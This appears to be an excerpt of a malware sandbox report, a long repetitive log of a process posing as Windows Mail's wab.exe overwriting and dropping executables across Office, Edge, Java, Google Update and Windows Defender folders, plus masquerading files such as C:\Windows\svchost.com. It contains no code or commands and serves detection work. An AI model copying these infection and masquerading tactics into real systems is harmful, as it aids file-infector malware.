Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
